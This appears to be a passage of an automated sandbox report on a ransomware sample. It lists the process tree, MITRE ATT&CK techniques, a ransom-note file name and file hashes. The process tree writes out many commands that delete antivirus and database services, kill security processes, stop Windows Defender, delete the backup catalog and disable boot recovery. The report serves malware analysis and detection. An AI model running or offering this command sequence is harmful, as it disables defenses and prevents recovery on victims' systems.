- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$PROGID"
    3⤵
    - Launches sc.exe
    PID:4680
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$WOLTERSKLUWER"
    3⤵
    - Launches sc.exe
    PID:2032
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQLFDLauncher$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:4856
- - C:\Windows\SysWOW64\sc.exe
    sc delete "MSSQL$OPTIMA"
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SQLAgent$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:3480
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ReportServer$OPTIMA"
    3⤵
    - Launches sc.exe
    PID:4892
- - C:\Windows\SysWOW64\sc.exe
    sc delete "msftesql$SQLEXPRESS"
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\sc.exe
    sc delete "postgresql-x64-9.4"
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\sc.exe
    sc delete "WRSVC"
    3⤵
    - Launches sc.exe
    PID:4144
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrn"
    3⤵
    - Launches sc.exe
    PID:2792
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ekrnEpsw"
    3⤵
    - Launches sc.exe
    PID:2236
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klim6"
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVP18.0.0"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KLIF"
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klpd"
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klflt"
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupdisk"
    3⤵
    - Launches sc.exe
    PID:892
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klbackupflt"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klkbdflt"
    3⤵
    - Launches sc.exe
    PID:4052
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klmouflt"
    3⤵
    - Launches sc.exe
    PID:840
- - C:\Windows\SysWOW64\sc.exe
    sc delete "klhk"
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\sc.exe
    sc delete "KSDE1.0.0"
    3⤵
    - Launches sc.exe
    PID:3728
- - C:\Windows\SysWOW64\sc.exe
    sc delete "kltap"
    3⤵
    PID:3812
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ScSecSvc"
    3⤵
    PID:908
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Mail Protection"
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning Server"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Scanning ServerEx"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Online Protection System"
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\sc.exe
    sc delete "RepairService"
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Core Browsing Protection"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Quick Update Service"
    3⤵
    - Launches sc.exe
    PID:4220
- - C:\Windows\SysWOW64\sc.exe
    sc delete "McAfeeFramework"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\sc.exe
    sc delete "macmnsvc"
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\sc.exe
    sc delete "masvc"
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfemms"
    3⤵
    - Launches sc.exe
    PID:3532
- - C:\Windows\SysWOW64\sc.exe
    sc delete "mfevtp"
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmFilter"
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMLWCSService"
    3⤵
    - Launches sc.exe
    PID:1268
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmusa"
    3⤵
    - Launches sc.exe
    PID:4600
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPreFilter"
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMSmartRelayService"
    3⤵
    PID:4064
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TMiCRCScanService"
    3⤵
    - Launches sc.exe
    PID:4468
- - C:\Windows\SysWOW64\sc.exe
    sc delete "VSApiNt"
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmCCSF"
    3⤵
    - Launches sc.exe
    PID:3692
- - C:\Windows\SysWOW64\sc.exe
    sc delete "tmlisten"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmProxy"
    3⤵
    PID:3140
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ntrtscan"
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\sc.exe
    sc delete "ofcservice"
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\sc.exe
    sc delete "TmPfw"
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PccNTUpd"
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PandaAetherAgent"
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\sc.exe
    sc delete "PSUAService"
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\sc.exe
    sc delete "NanoServiceMain"
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPIntegrationService"
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPProtectedService"
    3⤵
    - Launches sc.exe
    PID:1380
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPRedline"
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPSecurityService"
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\sc.exe
    sc delete "EPUpdateService"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\sc.exe
    sc delete "UniFi"
    3⤵
    - Launches sc.exe
    PID:2640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im PccNTMon.exe
    3⤵
    - Kills process with taskkill
    PID:4452
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im NTRtScan.exe
    3⤵
    - Kills process with taskkill
    PID:2096
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmListen.exe
    3⤵
    - Kills process with taskkill
    PID:4608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmCCSF.exe
    3⤵
    - Kills process with taskkill
    PID:3912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmProxy.exe
    3⤵
    - Kills process with taskkill
    PID:432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:3596
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TMBMSRV.exe
    3⤵
    - Kills process with taskkill
    PID:4936
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im TmPfw.exe
    3⤵
    - Kills process with taskkill
    PID:4616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im CNTAoSMgr.exe
    3⤵
    - Kills process with taskkill
    PID:4464
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    PID:4236
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    PID:3780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:1920
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msmdsrv.exe
    3⤵
    - Kills process with taskkill
    PID:1200
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im MsDtsSrvr.exe
    3⤵
    - Kills process with taskkill
    PID:2688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlceip.exe
    3⤵
    - Kills process with taskkill
    PID:4308
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im Ssms.exe
    3⤵
    - Kills process with taskkill
    PID:1844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im SQLAGENT.EXE
    3⤵
    - Kills process with taskkill
    PID:4320
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdhost.exe
    3⤵
    - Kills process with taskkill
    PID:2172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im fdlauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im sqlservr.exe
    3⤵
    - Kills process with taskkill
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im ReportingServicesService.exe
    3⤵
    - Kills process with taskkill
    PID:3036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im msftesql.exe
    3⤵
    - Kills process with taskkill
    PID:2016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im pg_ctl.exe
    3⤵
    - Kills process with taskkill
    PID:4776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill -f -im postgres.exe
    3⤵
    - Kills process with taskkill
    PID:4724
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:3896
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ISARS
    3⤵
    PID:4468
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ISARS
      4⤵
      PID:112
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$MSFW
    3⤵
    PID:3352
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$MSFW
      4⤵
      PID:2968
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ISARS
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ISARS
      4⤵
      PID:4668
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$MSFW
    3⤵
    PID:408
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$MSFW
      4⤵
      PID:2904
- - C:\Windows\SysWOW64\net.exe
    net stop SQLBrowser
    3⤵
    PID:3660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser
      4⤵
      PID:912
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$ISARS
    3⤵
    PID:1112
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$ISARS
      4⤵
      PID:3068
- - C:\Windows\SysWOW64\net.exe
    net stop SQLWriter
    3⤵
    PID:3136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLWriter
      4⤵
      PID:736
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      PID:4172
- - C:\Windows\SysWOW64\net.exe
    net stop mr2kserv
    3⤵
    PID:2096
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mr2kserv
      4⤵
      PID:1628
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeADTopology
    3⤵
    PID:5036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeADTopology
      4⤵
      PID:2744
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeFBA
    3⤵
    PID:3548
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeFBA
      4⤵
      PID:2544
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS
    3⤵
    PID:3432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS
      4⤵
      PID:396
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA
    3⤵
    PID:4256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA
      4⤵
      PID:4300
- - C:\Windows\SysWOW64\net.exe
    net stop ShadowProtectSvc
    3⤵
    PID:3268
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShadowProtectSvc
      4⤵
      PID:1528
- - C:\Windows\SysWOW64\net.exe
    net stop SPAdminV4
    3⤵
    PID:2808
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPAdminV4
      4⤵
      PID:2596
- - C:\Windows\SysWOW64\net.exe
    net stop SPTimerV4
    3⤵
    PID:3768
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTimerV4
      4⤵
      PID:1836
- - C:\Windows\SysWOW64\net.exe
    net stop SPTraceV4
    3⤵
    PID:3692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPTraceV4
      4⤵
      PID:112
- - C:\Windows\SysWOW64\net.exe
    net stop SPUserCodeV4
    3⤵
    PID:3472
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPUserCodeV4
      4⤵
      PID:4216
- - C:\Windows\SysWOW64\net.exe
    net stop SPWriterV4
    3⤵
    PID:4156
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPWriterV4
      4⤵
      PID:836
- - C:\Windows\SysWOW64\net.exe
    net stop SPSearch4
    3⤵
    PID:4620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SPSearch4
      4⤵
      PID:2236
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100
    3⤵
    PID:764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100
      4⤵
      PID:4388
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:3748
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:3144
- - C:\Windows\SysWOW64\net.exe
    net stop firebirdguardiandefaultinstance
    3⤵
    PID:4752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
      4⤵
      PID:496
- - C:\Windows\SysWOW64\net.exe
    net stop ibmiasrw
    3⤵
    PID:3900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ibmiasrw
      4⤵
      PID:3800
- - C:\Windows\SysWOW64\net.exe
    net stop QBCFMonitorService
    3⤵
    PID:2828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService
      4⤵
      PID:4356
- - C:\Windows\SysWOW64\net.exe
    net stop QBVSS
    3⤵
    PID:988
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBVSS
      4⤵
      PID:3896
- - C:\Windows\SysWOW64\net.exe
    net stop QBPOSDBServiceV12
    3⤵
    PID:4620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBPOSDBServiceV12
      4⤵
      PID:4112
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
    3⤵
    PID:3900
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
      4⤵
      PID:4020
- - C:\Windows\SysWOW64\net.exe
    net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
    3⤵
    PID:684
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
      4⤵
      PID:4680
- - C:\Windows\SysWOW64\net.exe
    net stop IISADMIN
    3⤵
    PID:1428
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISADMIN
      4⤵
      PID:3440
- - C:\Windows\SysWOW64\net.exe
    net stop "Simply Accounting Database Connection Manager"
    3⤵
    PID:3912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
      4⤵
      PID:3224
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB1
    3⤵
    PID:2688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB1
      4⤵
      PID:1588
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB2
    3⤵
    PID:2100
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB2
      4⤵
      PID:2912
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB3
    3⤵
    PID:3644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB3
      4⤵
      PID:4548
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB4
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB4
      4⤵
      PID:5036
- - C:\Windows\SysWOW64\net.exe
    net stop QuickBooksDB5
    3⤵
    PID:3692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QuickBooksDB5
      4⤵
      PID:32
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq MsMpEng.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:3136
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq ntrtscan.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:944
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq avp.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:1116
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3752
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3300
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq WRSA.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:4260
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq egui.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:1428
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /fi "imagename eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:3276
- - C:\Windows\SysWOW64\find.exe
    find /c "PID"
    3⤵
    PID:3820
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:4140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:5012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
  2⤵
  PID:1692

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\Lang\!!! YOUR FILES HAVE BEEN ENCRYPTED !!!.TXT

Filesize
1KB

MD5
142407824c2119f5817265b00e17d3d2

SHA1
752f18a36a46c93b93ef32b8027122882d4b33b4

SHA256
3ef2a6239d21146ab55ec92b928375935f7516875bb1c5093afc97f5408a0942

SHA512
59b578bdb9ec957eb1bbe595d1010b89b4895c1f8cc25582c0966ed3a89f24d31ededa36dbe09feaba0fd50fa723f08bb8f2d78ede73bd7f56c2e1d70ca7d972

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html

Filesize
7KB

MD5
a6211518d7fa652103004d182721ee1f

SHA1
60a81a4e267cc9e7bc2b39c14a70aed9852c7393

SHA256
896b7fcbb7af583ecb5638e1e783d6fa42808174b79ec22bdccbcfbd196a706a

SHA512
6dec1d4f822a02950a240effe9a3842cfb492cfb6174b999861a73cbad799b274ca9d82bdcf63829e0e5d2880a64d7f5a6bcf96e57384cd3f61f52733c5a1858

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\license.html

Filesize
10KB

MD5
e2ba5a239bdd4ec588364d23a370ffa0

SHA1
c8297f6c9126eb30eb772c6e0b0a1d10ac4632f9

SHA256
c0d7d503516047facd3117d89a881b4d211b56d243facd9cd86f790b121e4493

SHA512
c9bdf91f076192f097dacd8c911baeccf53278c375f34c8c128d74647a29fb111506fa5220fdaa48908568a45cabc0b1ded231f62b773ce3ab136d565d67815e

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
2c6ac4063a82d8e6c76f0a000ef7edf0

SHA1
425edf81d207d664725cbaa866a3154dbf158583

SHA256
c96ee5ab3ce6d6d823369a70dbcb8dfae756593fc86a09ff814b247645742cd9

SHA512
cc213c1ed971c79e81731f02fa02218dbeda3ef5ecdee1da9bda52a481e414514f98756f281f100ed2bc78ec169e8245a74a1d80189261c7446d39c52c93e337

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html

Filesize
10KB

MD5
5270fec15ba8dab89ffec5a8eea1809a

SHA1
ee07e76e13f42f9800e78ffc70fbfe32d8f78250

SHA256
131008e0fbb919c6fb8c9086549bdf0d4fedbc42bb221744cc9c07d6ccc7008e

SHA512
a6fd86b63f3a2d2b61626097282c6bb5ce36e9d6d5408b2a61b6b7a450763df46851290a478b6ee2c9b52925a3b4ab6a4682f342ff2b10b7b0af35de34d019f1

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html

Filesize
13KB

MD5
7453492e1c8b9df2c632436ec26dacc0

SHA1
524bc04207711cc53d99645d0a9d08e04c8cdde1

SHA256
fccd79b1de449c75f4a4db9735f5a9fc1044abe8bd0ddbba3c562af6ec2de553

SHA512
36d6703deb803b2bc4ba8c7db9547e9774a79bc4d949e3737df3ecef66da7550a15cc971bac2dd8d1f0caf5fdac47df47fa661fb350a254004578688d55d0224

Download Submit
C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html

Filesize
10KB

MD5
d1d45bd24fe93ec67bc8e1697e92dad4

SHA1
31b3e0bb691a270a64f4c553e5af8d2402a3e4a4

SHA256
e99cdeb71e742f11bd0909a5827de1e168713d59cc81ab7dd23afb3464a9a3b7

SHA512
fe4dbfa7972fffae86fb50a47a86a268a71a305f2a8913972f7ddc0ebe461a9d73c3a5396057c32152c68208e182a8abea57d9e665f87b7d8276fd4636d7a114

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat

Filesize
10KB

MD5
0d0bd9b3d068d303baace9d289906182

SHA1
15e9b273494cd57a8e5b12b8f821019a49bcf983

SHA256
779735a7b4cab272dde5f971d743d7ac9c6925b437dba5f6478757f696958d1e

SHA512
76d96eb2aec728acb8f401532964346f82c4e0cf250dbac25485839e75fdab790be877fdf2f734c3acff8aa4e830efb4960cddf7490e75749ee09afeaa629325

Download Submit
C:\vcredist2010_x86.log.html

Filesize
82KB

MD5
1e1132c6234b898fd214e61243b4d4d6

SHA1
a78544ef6ee74fa335cc2eae777bd1141bc611d3

SHA256
46766607b42f22cf1c699ed4e4a656bddd31456ac30c50ff4406d2fbc6d9a930

SHA512
bede7c24acd50796c921712cfe1cfafe8ecb15b833998c63d9bf153d5ebec6b45a1e65ea3bbb906373392a53cf64791bd3aa6516bb765ba3b90b2ad7a0c3cd33

Download Submit
memory/1036-650-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-5599-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-1220-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-1686-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-11611-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-874-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-10057-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-8751-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-7164-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-6509-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-4471-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1036-3170-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/1496-151-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-136-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-964-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-308-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-7367-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-133-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-732-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download
memory/4184-1816-0x0000000000650000-0x0000000000793000-memory.dmp

Filesize
1.3MB

Download